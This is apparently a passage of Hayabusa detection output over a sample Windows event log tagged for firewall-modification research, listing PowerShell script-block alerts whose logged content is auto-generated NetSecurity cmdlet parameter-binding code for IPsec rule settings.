[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { 